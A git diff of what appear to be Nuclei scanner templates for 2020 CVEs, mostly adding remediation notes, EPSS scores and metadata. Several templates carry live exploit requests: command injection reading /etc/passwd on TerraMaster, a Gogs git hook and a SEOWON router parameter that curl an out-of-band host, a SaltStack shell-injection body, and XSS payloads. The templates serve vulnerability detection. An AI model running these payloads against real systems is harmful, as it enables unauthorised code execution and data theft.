490a0046304402205520893883724e8b30e152b522bbf32d70b84b47f82f49b9d69dfbe9a999f0f40220676656b480c52c510b626eed64da40ab58896464a273d8093f4adfde239001fe:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml index e4b11fd621..e64083d75f 100644 --- a/http/cves/2020/CVE-2020-15129.yaml +++ b/http/cves/2020/CVE-2020-15129.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: Traefik before 1.7.26, 2.2.8, and 2.3.0-rc3 contains an open redirect vulnerability in the X-Forwarded-Prefix header. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the vendor-provided patch or upgrade to a non-vulnerable version of Traefik. reference: - https://securitylab.github.com/advisories/GHSL-2020-140-Containous-Traefik - https://github.com/containous/traefik/releases/tag/v2.2.8 @@ -16,11 +18,14 @@ info: cvss-score: 4.7 cve-id: CVE-2020-15129 cwe-id: CWE-601 + epss-score: 0.00701 + epss-percentile: 0.78106 cpe: cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* - epss-score: 0.00519 - tags: cve,cve2020,traefik,redirect metadata: max-request: 1 + vendor: traefik + product: traefik + tags: cve,cve2020,traefik,redirect http: - method: GET @@ -32,13 +37,13 @@ http: matchers-condition: and matchers: - - type: status - status: - - 302 - - type: word part: body words: - "Found" -# Enhanced by md on 2022/10/13 + - type: status + status: + - 302 + +# digest: 4b0a00483046022100c10e0e0e6033deb99ffbb008400333e666659e3d28d07e9d4400fa66a2c9e6dd0221008729fc32135e70d988328a5b3c8982bcd819eb981a294ae3fe1a5f745936108b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml index 34b71f6245..24e1e55f20 100644 --- a/http/cves/2020/CVE-2020-15148.yaml +++ b/http/cves/2020/CVE-2020-15148.yaml @@ -5,22 +5,25 @@ info: author: pikpikcu severity: critical description: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. + remediation: Upgrade to version 2.0.38 or later. A possible workaround without upgrading is available in the linked advisory. reference: - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943 - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md - https://github.com/yiisoft/yii2/commit/9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99 - https://github.com/yiisoft/yii2/security/advisories/GHSA-699q-wcff-g9mj - remediation: Upgrade to version 2.0.38 or later. A possible workaround without upgrading is available in the linked advisory. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2020-15148 cwe-id: CWE-502 + epss-score: 0.01898 + epss-percentile: 0.87209 cpe: cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:* - epss-score: 0.01843 - tags: cve,cve2020,rce,yii metadata: max-request: 1 + vendor: yiiframework + product: yii + tags: cve,cve2020,rce,yii http: - method: GET @@ -39,4 +42,4 @@ http: status: - 500 -# Enhanced by mp on 2022/04/27 +# digest: 4a0a00473045022077b88e4cc0acbcccae6757a630c2f567867c64127248bb8e0f4feae9add3960f022100baa9586f50da29982ecfb5559004fe95ebb1a7261057588bf165aeed18699e19:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml index e5c4ad8815..5d659280a6 100644 --- a/http/cves/2020/CVE-2020-15227.yaml +++ b/http/cves/2020/CVE-2020-15227.yaml @@ -5,20 +5,27 @@ info: author: becivells severity: critical description: Nette Framework versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, and 3.0.6 are vulnerable to a code injection attack via specially formed parameters being passed to a URL. Nette is a PHP/Composer MVC Framework. + remediation: | + Apply the latest security patches provided by the Nette Framework to fix the deserialization vulnerability. reference: - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94 - - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md - https://nvd.nist.gov/vuln/detail/CVE-2020-15227 + - https://lists.debian.org/debian-lts-announce/2021/04/msg00003.html + - https://packagist.org/packages/nette/application classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-15227 - cwe-id: CWE-74 - epss-score: 0.97403 - tags: cve,cve2020,nette,rce + cwe-id: CWE-94,CWE-74 + epss-score: 0.97307 + epss-percentile: 0.9983 + cpe: cpe:2.3:a:nette:application:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: nette + product: application + tags: cve,cve2020,nette,rce http: - method: GET @@ -27,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/27 +# digest: 4a0a0047304502200cfdde87d356243779f86b412f172c89cbf0ff96172b4e272d84e7c991808d010221008bef358372814a0d7bbefc9d285d738c6976cae9e39152941e2980f69763a4c4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml index 7c1a5e02c0..9b0595661f 100644 --- a/http/cves/2020/CVE-2020-15500.yaml +++ b/http/cves/2020/CVE-2020-15500.yaml @@ -5,6 +5,8 @@ info: author: Akash.C severity: medium description: TileServer GL through 3.0.0 is vulnerable to reflected cross-site scripting via server.js because the content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page. + remediation: | + Upgrade TileServer GL to a version higher than 3.0.0 or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://github.com/maptiler/tileserver-gl/issues/461 - http://packetstormsecurity.com/files/162193/Tileserver-gl-3.0.0-Cross-Site-Scripting.html @@ -14,11 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-15500 cwe-id: CWE-79 - cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:* epss-score: 0.0021 - tags: cve,cve2020,xss,tileserver,packetstorm + epss-percentile: 0.5871 + cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: tileserver + product: tileservergl + tags: cve,cve2020,xss,tileserver,packetstorm http: - method: GET @@ -27,18 +32,18 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: header words: - "text/html" - type: word + part: body words: - "'>\"" - part: body -# Enhanced by mp on 2022/08/15 + - type: status + status: + - 200 + +# digest: 490a004630440220529373b135b0b20f1d6638c2f640e20e77cfc1924459f5e246b8bb33446456a60220523c26a0f7ee295786fc22a67e1f418da06a5be801f2149ded48e223f45109b7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-15505.yaml b/http/cves/2020/CVE-2020-15505.yaml index 54bbfbc4c2..39add25166 100644 --- a/http/cves/2020/CVE-2020-15505.yaml +++ b/http/cves/2020/CVE-2020-15505.yaml @@ -4,12 +4,13 @@ id: CVE-2020-15505 # To carry out further attacks, please see reference[2] below. # This template works by passing a Hessian header, otherwise; # it will return a 403 or 500 internal server error. Reference[3]. - info: name: MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - Remote Code Execution author: dwisiswant0 severity: critical description: A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier contain a vulnerability that allows remote attackers to execute arbitrary code via unspecified vectors. + remediation: | + Upgrade MobileIron Core & Connector and Sentry to versions above v10.6 & v9.8 respectively reference: - https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html - https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505 @@ -20,10 +21,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-15505 - epss-score: 0.97524 - tags: cve,cve2020,mobileiron,rce,sentry,kev + cwe-id: CWE-706 + epss-score: 0.97504 + epss-percentile: 0.99976 + cpe: cpe:2.3:a:mobileiron:core:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mobileiron + product: core + tags: cve,cve2020,mobileiron,rce,sentry,kev http: - raw: @@ -35,14 +41,16 @@ http: Connection: close {{hex_decode('630200480004')}} + matchers-condition: and matchers: - type: word + part: header words: - "application/x-hessian" - part: header + - type: status status: - 200 -# Enhanced by mp on 2022/04/27 +# digest: 490a0046304402207201caf4909dc7dd7c1f1d6eee6b086423f1bb136c4374cfff8a2030085e316102202a9bc4fff9783376c3076d9fbc3063c3c4959769b366d8636577446f6e924fd2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-15568.yaml b/http/cves/2020/CVE-2020-15568.yaml index 8e43891a0d..b5380cffa2 100644 --- a/http/cves/2020/CVE-2020-15568.yaml +++ b/http/cves/2020/CVE-2020-15568.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: TerraMaster TOS before 4.1.29 has invalid parameter checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter. + remediation: | + Upgrade TerraMaster TOS to version 1.29 or higher to mitigate this vulnerability. reference: - https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2020-15568 @@ -14,32 +16,37 @@ info: cvss-score: 9.8 cve-id: CVE-2020-15568 cwe-id: CWE-913 + epss-score: 0.96258 + epss-percentile: 0.99362 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* - epss-score: 0.96812 - tags: cve,cve2020,terramaster,rce metadata: max-request: 2 + vendor: terra-master + product: tos + tags: cve,cve2020,terramaster,rce +variables: + filename: "{{to_lower(rand_text_alpha(4))}}" http: - raw: - | - GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1 + GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - - | - GET /include/nuclei.txt HTTP/1.1 + GET /include/{{filename}}.txt HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body + - type: status status: - 200 -# Enhanced by mp on 2022/04/27 +# digest: 490a00463044022021e2de4acd9276e92455920676ded28a5f480de04f189bc61b29a410e1bc50af0220142f3ee2e4a86a8db7aaba7418a565f6629fcfc5be0a2eb27534bb70765dc776:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml index 27e59a2494..6e07bd4105 100644 --- a/http/cves/2020/CVE-2020-15867.yaml +++ b/http/cves/2020/CVE-2020-15867.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Gogs 0.5.5 through 0.12.2 is susceptible to authenticated remote code execution via the git hooks functionality. There can be a privilege escalation if access to this feature is granted to a user who does not have administrative privileges. NOTE: Since this is mentioned in the documentation but not in the UI, it could be considered a "product UI does not warn user of unsafe actions" issue. + remediation: | + Upgrade Gogs to a version that is not affected by the vulnerability (0.12.3 or later). reference: - https://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html - https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/ @@ -15,48 +17,45 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2020-15867 + epss-score: 0.96701 + epss-percentile: 0.99526 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* - epss-score: 0.9663 metadata: - max-request: 7 verified: true - tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm + max-request: 7 + vendor: gogs + product: gogs + tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive http: - raw: - | GET /user/login HTTP/1.1 Host: {{Hostname}} - - | POST /user/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}} - - | GET /repo/create HTTP/1.1 Host: {{Hostname}} - - | POST /repo/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on - - | POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}} - - | GET /{{username}}/{{randstr}}/_new/master HTTP/1.1 Host: {{Hostname}} - - | POST /{{username}}/{{randstr}}/_new/master HTTP/1.1 Host: {{Hostname}} @@ -65,38 +64,39 @@ http: _csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct cookie-reuse: true + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - - "http" + - http - type: word part: body_1 words: - - 'content="Gogs' + - content="Gogs extractors: - type: regex name: csrf group: 1 regex: - - 'name="_csrf" value="(.*)"' + - name="_csrf" value="(.*)" internal: true - type: regex name: auth_csrf group: 1 regex: - - 'name="_csrf" content="(.*)"' + - name="_csrf" content="(.*)" internal: true - type: regex name: last_commit group: 1 regex: - - 'name="last_commit" value="(.*)"' + - name="last_commit" value="(.*)" internal: true -# Enhanced by md on 2023/03/28 +# digest: 4a0a00473045022072398705b4521f78e38d8c2c934a5ba9a7ebed95fcfedf8781ee3aba3f25f6ce02210096f8ccb304636d3c647e91a6fa7e857bd95962848baf2d73c56a4f6b8c027592:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index 740fbed435..3166c57877 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | D-Link DIR-816L devices 2.x before 1.10b04Beta02 contains a cross-site scripting vulnerability. In the file webinc/js/info.php, no output filtration is applied to the RESULT parameter before being printed on the webpage. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow for theft of cookie-based authentication credentials and launch of other attacks. + remediation: | + Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: - https://research.loginsoft.com/bugs/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/ - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10169 @@ -16,8 +18,12 @@ info: cve-id: CVE-2020-15895 cwe-id: CWE-79 epss-score: 0.00187 + epss-percentile: 0.55797 + cpe: cpe:2.3:o:d-link:dir-816l_firmware:2.06:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: d-link + product: dir-816l_firmware shodan-query: html:"DIR-816L" tags: cve,cve2020,dlink,xss @@ -44,4 +50,4 @@ http: status: - 200 -# Enhanced by md on 2023/02/22 +# digest: 490a004630440220585bbed397ae750d32ec5f2012d13110bf2740bc7cff524cc69854ba7d7c0106022019a97eacb60fd9a72e84d19fbd46517cd65f39dafe3d251db3aa9681098450f5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-15920.yaml b/http/cves/2020/CVE-2020-15920.yaml index e8f5e697be..c2d00d4927 100644 --- a/http/cves/2020/CVE-2020-15920.yaml +++ b/http/cves/2020/CVE-2020-15920.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Mida eFramework through 2.9.0 allows an attacker to achieve remote code execution with administrative (root) privileges. No authentication is required. + remediation: | + Upgrade Mida eFramework to a version higher than 2.9.0 to mitigate the vulnerability. reference: - https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html - http://packetstormsecurity.com/files/158991/Mida-eFramework-2.9.0-Remote-Code-Execution.html @@ -15,11 +17,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-15920 cwe-id: CWE-78 + epss-score: 0.97253 + epss-percentile: 0.99787 cpe: cpe:2.3:a:midasolutions:eframework:*:*:*:*:*:*:*:* - epss-score: 0.97362 - tags: cve,cve2020,mida,rce,packetstorm metadata: max-request: 1 + vendor: midasolutions + product: eframework + tags: cve,cve2020,mida,rce,packetstorm http: - method: POST @@ -36,4 +41,5 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/05/16 + +# digest: 4b0a00483046022100bff441f12669d6f12ce7ba9bacccba0d10724074810bbbd92c54e9b3b56149d0022100a4ca3ec334c796bdf9b6d3c761b97b32c3c886d69576c947bfd5055e4db02a91:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-16139.yaml b/http/cves/2020/CVE-2020-16139.yaml index 3182224201..ade9da4f50 100644 --- a/http/cves/2020/CVE-2020-16139.yaml +++ b/http/cves/2020/CVE-2020-16139.yaml @@ -6,20 +6,24 @@ info: severity: high description: | Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to restart the device remotely via specially crafted packets that can cause a denial-of-service condition. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. + remediation: | + Apply the latest firmware update provided by Cisco to mitigate this vulnerability. reference: - - https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/ - http://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html - - https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/ - https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html - https://nvd.nist.gov/vuln/detail/CVE-2020-16139 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2020-16139 - epss-score: 0.00835 - tags: cve,cve2020,dos,cisco,packetstorm + epss-score: 0.01392 + epss-percentile: 0.8493 + cpe: cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: unified_ip_conference_station_7937g_firmware + tags: cve,cve2020,dos,cisco,packetstorm http: - raw: @@ -29,15 +33,17 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: header words: - "application/xml" + - type: word words: - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' -# Enhanced by mp on 2022/07/13 + - type: status + status: + - 200 + +# digest: 4a0a0047304502202fcd5da10764925aba859c66e002db311441d473cbdbd3972dfb667c5abbd3f60221009c726a5c03fa1da9e7a986a1a13cdf56e57fce15fe8795d5e3c4c484f9811cf6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-16846.yaml b/http/cves/2020/CVE-2020-16846.yaml index 0855dd3f8e..1e55afe8f6 100644 --- a/http/cves/2020/CVE-2020-16846.yaml +++ b/http/cves/2020/CVE-2020-16846.yaml @@ -6,40 +6,52 @@ info: severity: critical description: | SaltStack Salt through 3002 allows an unauthenticated user with network access to the Salt API to use shell injections to run code on the Salt-API using the SSH client. + remediation: | + Upgrade to a patched version of SaltStack (>=3003) to mitigate this vulnerability. reference: - https://saltproject.io/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/ - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag - https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846 - https://nvd.nist.gov/vuln/detail/CVE-2020-16846 + - http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00029.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-16846 cwe-id: CWE-78 - epss-score: 0.97535 - tags: vulhub,cve,cve2020,saltstack,kev + epss-score: 0.97532 + epss-percentile: 0.99989 + cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: saltstack + product: salt + tags: vulhub,cve,cve2020,saltstack,kev +variables: + priv: "{{to_lower(rand_text_alpha(5))}}" + roaster: "{{to_lower(rand_text_alpha(6))}}" http: - method: POST path: - "{{BaseURL}}/run" - body: "token=1337&client=ssh&tgt=*&fun=a&roster=projectdiscovery&ssh_priv=nuclei" + + body: "token=1337&client=ssh&tgt=*&fun=a&roster={{roaster}}&ssh_priv={{priv}}" + headers: Content-Type: application/x-www-form-urlencoded # CherryPy will abort w/o define this header matchers-condition: and matchers: + - type: dsl + dsl: + - regex("CherryPy\/([0-9.]+)", header) || regex("CherryPy ([0-9.]+)", body) + - type: word part: body words: - "An unexpected error occurred" - - type: dsl - dsl: - - regex("CherryPy\/([0-9.]+)", header) || regex("CherryPy ([0-9.]+)", body) - - type: word part: header words: @@ -48,4 +60,5 @@ http: - type: status status: - 500 -# Enhanced by mp on 2022/04/27 + +# digest: 4b0a00483046022100a07dcba92e3f92b8db991c3d8d7509587f1b4bf65b5f2ae66874c7719a31136b022100a7aa3673c9fdb578d9c82259b32d1bc64000b40650b464d114dd3a71cb532647:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml index 09034350b3..39140e1888 100644 --- a/http/cves/2020/CVE-2020-16952.yaml +++ b/http/cves/2020/CVE-2020-16952.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: Microsoft SharePoint is vulnerable to a remote code execution when the software fails to check the source markup of an application package. + remediation: | + Apply the latest security updates provided by Microsoft to address this vulnerability. reference: - https://srcincite.io/pocs/cve-2020-16952.py.txt - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952 @@ -15,10 +17,14 @@ info: cvss-score: 7.8 cve-id: CVE-2020-16952 cwe-id: CWE-346 - epss-score: 0.23324 - tags: msf,cve,cve2020,sharepoint,iis,microsoft,ssi,rce + epss-score: 0.4236 + epss-percentile: 0.96917 + cpe: cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: microsoft + product: sharepoint_enterprise_server + tags: msf,cve,cve2020,sharepoint,iis,microsoft,ssi,rce http: - method: GET @@ -46,4 +52,4 @@ http: - 201 condition: or -# Enhanced by mp on 2022/07/13 +# digest: 490a0046304402206b587982b7288a1893e482e8153a1fb8e520a3c509b8e89422c0f04e1bc1837202200cc5911c46354fafc63755322bba7d40b0219fe791fe2f2286e0e29722fe98a7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml index 89c7e2501f..b6ab67588a 100644 --- a/http/cves/2020/CVE-2020-17362.yaml +++ b/http/cves/2020/CVE-2020-17362.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Nova Lite before 1.3.9 for WordPress is susceptible to reflected cross-site scripting via search.php. + remediation: | + Upgrade to Nova Lite version 1.3.9 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 - https://nvd.nist.gov/vuln/detail/CVE-2020-17362 @@ -14,11 +16,15 @@ info: cvss-score: 6.1 cve-id: CVE-2020-17362 cwe-id: CWE-79 - cpe: cpe:2.3:a:themeinprogress:nova_lite:*:*:*:*:*:*:*:* - epss-score: 0.00095 - tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020,unauth + epss-score: 0.00101 + epss-percentile: 0.41239 + cpe: cpe:2.3:a:themeinprogress:nova_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: themeinprogress + product: nova_lite + framework: wordpress + tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020,unauth http: - method: GET @@ -28,14 +34,14 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word + part: body words: - "nova-lite" - part: body - type: word part: header @@ -46,4 +52,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/04 +# digest: 490a0046304402204ca5748f46626be5b457f6397246e194744410a3f91d0604a2043a0ee6e28e3e02207deca3def8b9d5f6df1ce1250dec3656d48d3caa7d1db9fe32583f209d4019d7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index 474f7a7fed..e03f37c4dc 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests. + remediation: | + Upgrade to a patched version of WSO2 Carbon Management Console (5.11 or above) or apply the provided security patch to mitigate this vulnerability. reference: - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132 - https://nvd.nist.gov/vuln/detail/CVE-2020-17453 @@ -14,30 +16,34 @@ info: cvss-score: 6.1 cve-id: CVE-2020-17453 cwe-id: CWE-79 - epss-score: 0.02402 - tags: xss,wso2,cve2020,cve + epss-score: 0.01736 + epss-percentile: 0.86495 + cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wso2 + product: api_manager + tags: xss,wso2,cve2020,cve http: - method: GET path: - - '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F' + - '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F' matchers-condition: and matchers: + - type: word + part: body + words: + - "'';alert('document.domain')//';" + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - type: word - words: - - "'';alert('nuclei')//';" - part: body - - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/05/04 +# digest: 4b0a00483046022100872bad69e79fb6730b37b807aa82c3fcea220512683b2749266e587912298eab022100cfa1a356ffc5db174e3bfa42807ad1eacbb6321fcd32b5e26f46ec1d64c8c1e5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index 8977f51ea9..6cc1885319 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml @@ -5,20 +5,27 @@ info: author: gy741,edoardottt severity: critical description: SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/ - https://nvd.nist.gov/vuln/detail/CVE-2020-17456 - http://packetstormsecurity.com/files/158933/Seowon-SlC-130-Router-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/166273/Seowon-SLR-120-Router-Remote-Code-Execution.html + - https://www.exploit-db.com/exploits/50821 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-17456 cwe-id: CWE-78 - epss-score: 0.97283 - tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve + epss-score: 0.97074 + epss-percentile: 0.99686 + cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 - + vendor: seowonintech + product: slc-130_firmware + tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve variables: useragent: '{{rand_base(6)}}' @@ -40,6 +47,7 @@ http: Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018 cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -61,4 +69,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/27 +# digest: 4a0a00473045022054217950c0da9a168a9ed204bea1b004219828165da3278b7c366328ea70fb30022100df14301980f6ce02eb5cfdf6858ad33e85eac57757d20d1e6531ec54c95d3145:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-17463.yaml 